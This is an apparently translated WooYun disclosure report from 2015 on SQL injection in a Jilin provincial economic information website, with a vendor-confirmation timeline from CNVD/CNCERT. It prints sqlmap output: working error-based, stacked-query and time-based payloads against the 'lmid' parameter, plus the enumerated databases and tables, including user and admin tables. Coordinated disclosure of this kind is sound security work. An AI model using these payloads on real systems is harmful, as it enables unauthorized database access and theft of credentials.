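Vulnerability summary (24 followers)

Bug ID: wooyun-2015-0147308

Title: SQL injection in the Jilin Province Economic Information Network; 8 databases, many tables

Vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-10-17 09:03

Fixed: 2015-12-05 15:06

Publicly disclosed: 2015-12-05 15:06

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 11

Status: handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]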


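Vulnerability details

Disclosure status:

2015-10-17: Details reported to the vendor; awaiting vendor handling
2015-10-21: Vendor confirmed; details disclosed only to the vendor
2015-10-31: Details disclosed to core white hats and experts in related fields
2015-11-10: Details disclosed to regular white hats
2015-11-20: Details disclosed to trainee white hats
2015-12-05: Details disclosed to the public

Brief description:

The Jilin Province Economic Information Network has a SQL injection vulnerability. 8 databases, many tables.

Detailed description: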

http://**.**.**.**/hgjj/hgjjjjsj.jsp?lmid=8a8180251bfd9002011bfdd92ac10049

sqlmap identified the following injection points with a total of 62 HTTP(s) requests:
---
Parameter: lmid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lmid=8a8180251bfd9002011bfdd92ac10049' AND 8228=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (8228=8228) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113))) AND 'eous'='eous
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: lmid=8a8180251bfd9002011bfdd92ac10049'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: lmid=8a8180251bfd9002011bfdd92ac10049' WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
available databases [8]:
[*] fgw
[*] jljjw
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Database: tempdb
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: jljjw
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.article | 75607 |
| dbo.FRefer | 12830 |
| dbo.Visitor | 8766 |
| dbo.FMozilla | 5927 |
| dbo.FIptwo | 3506 |
| dbo.projectsb | 2657 |
| dbo.StatDay | 2425 |
| dbo.plate | 1194 |
| dbo.plate_view | 1194 |
| dbo.dzfw | 1144 |
| dbo.users | 1041 |
| dbo.filelista | 809 |
| dbo.FScreen | 533 |
| dbo.InfoList | 491 |
| dbo.FArea | 482 |
| dbo.sysuser_inputcolumn | 194 |
| dbo.user_view | 194 |
| dbo.FIpone | 165 |
| dbo.sysconstraints | 161 |
| dbo.temps | 143 |
| dbo.FSystem | 113 |
| dbo.StatMonth | 96 |
| dbo.FAddress | 93 |
| dbo.FBrowser | 63 |
| dbo.SYS_TMP | 61 |
| dbo.TH_area | 52 |
| dbo.IpScope | 33 |
| dbo.b | 26 |
| dbo.infofeedback | 23 |
| dbo.sysuser_checkcolumn | 17 |
| dbo.userrole_module | 17 |
| dbo.TH_hangye | 15 |
| dbo.projectsd | 14 |
| dbo.sysmodule | 14 |
| dbo.leavemessage | 13 |
| dbo.article_StatDay | 12 |
| dbo.article_StatWeek | 12 |
| dbo.D99_Tmp | 12 |
| dbo.StatYear | 12 |
| dbo.usersb | 10 |
| dbo.sysuser | 9 |
| dbo.sysuser_role | 9 |
| dbo.TH_diqu | 9 |
| dbo.sysuserrole | 8 |
| dbo.StatWeek | 7 |
| dbo.article_FBrowser | 6 |
| dbo.article_FIpone | 6 |
| dbo.article_FIptwo | 6 |
| dbo.article_FMozilla | 6 |
| dbo.article_FRefer | 6 |
| dbo.article_FScreen | 6 |
| dbo.article_FSystem | 6 |
| dbo.article_StatYear | 6 |
| dbo.article_temps | 6 |
| dbo.usersa | 6 |
| dbo.TH_fangshi | 5 |
| dbo.TH_tzfs | 5 |
| dbo.filelistb | 4 |
| dbo.TH_zblx | 4 |
| jlsa.infofeedbacktype | 4 |
| dbo.article_InfoList | 3 |
| dbo.dealprocess | 3 |
| dbo.lead | 3 |
| dbo.syssegments | 3 |
| dbo.TH_biaoqian | 3 |
| dbo.TH_jch | 3 |
| jlsa.infofeedback | 3 |
| dbo.browser | 2 |
| dbo.lktype | 2 |
| dbo.plate_plate | 2 |
| dbo.projectsa | 2 |
| dbo.TH_tzfszd | 2 |
| dbo.TH_xzh | 2 |
| dbo.TH_zhuti | 2 |
| dbo.admin | 1 |
| dbo.config | 1 |
| dbo.D99_REG | 1 |
| dbo.FVisit | 1 |
| dbo.infofeedbacktype | 1 |
| dbo.leadsort | 1 |
| dbo.NotDownload | 1 |
| dbo.projectsc | 1 |
| dbo.webuser | 1 |
| dbo.xmpwd | 1 |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.sysconstraints | 91 |
| dbo.syscategories | 19 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: pubs
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.roysched | 86 |
| dbo.employee | 43 |
| dbo.sysconstraints | 34 |
| dbo.titleauthor | 25 |
| dbo.titleview | 25 |
| dbo.authors | 23 |
| dbo.sales | 21 |
| dbo.titles | 18 |
| dbo.jobs | 14 |
| dbo.pub_info | 8 |
| dbo.publishers | 8 |
| dbo.stores | 6 |
| dbo.discounts | 3 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS | 2260 |
| dbo.spt_values | 730 |
| INFORMATION_SCHEMA.ROUTINES | 651 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379 |
| INFORMATION_SCHEMA.COLUMNS | 379 |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295 |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE | 62 |
| dbo.spt_datatype_info | 36 |
| INFORMATION_SCHEMA.TABLES | 34 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 33 |
| dbo.spt_server_info | 29 |
| dbo.spt_provider_types | 25 |
| INFORMATION_SCHEMA.VIEWS | 25 |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS | 17 |
| dbo.spt_datatype_info_ext | 10 |
| INFORMATION_SCHEMA.SCHEMATA | 8 |
| dbo.syssegments | 3 |
| dbo.spt_monitor | 1 |
| dbo.sysconstraints | 1 |
+--------------------------------------+---------+
Database: Northwind
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended] | 2155 |
| dbo.[Order Details] | 2155 |
| dbo.Invoices | 2155 |
| dbo.[Order Subtotals] | 830 |
| dbo.[Orders Qry] | 830 |
| dbo.Orders | 830 |
| dbo.[Summary of Sales by Quarter] | 809 |
| dbo.[Summary of Sales by Year] | 809 |
| dbo.[Customer and Suppliers by City] | 120 |
| dbo.Customers | 91 |
| dbo.[Quarterly Orders] | 86 |
| dbo.[Product Sales for 1997] | 77 |
| dbo.[Sales by Category] | 77 |
| dbo.Products | 77 |
| dbo.[Alphabetical list of products] | 69 |
| dbo.[Current Product List] | 69 |
| dbo.[Products by Category] | 69 |
| dbo.[Sales Totals by Amount] | 66 |
| dbo.Territories | 53 |
| dbo.EmployeeTerritories | 49 |
| dbo.sysconstraints | 43 |
| dbo.Suppliers | 29 |
| dbo.[Products Above Average Price] | 25 |
| dbo.Employees | 9 |
| dbo.[Category Sales for 1997] | 8 |
| dbo.Categories | 8 |
| dbo.Region | 4 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+

Proof of vulnerability:

1

Remediation:

Copyright notice: when reposting, please credit the source 路人甲@WooYun


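Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 10

Confirmed: 2015-10-21 15:04

Vendor reply:

CNVD has confirmed and reproduced the reported issue. It has been passed on by CNCERT to the Jilin branch center, which will follow up and coordinate with the organization that manages the website to handle it.

Latest status:

None yet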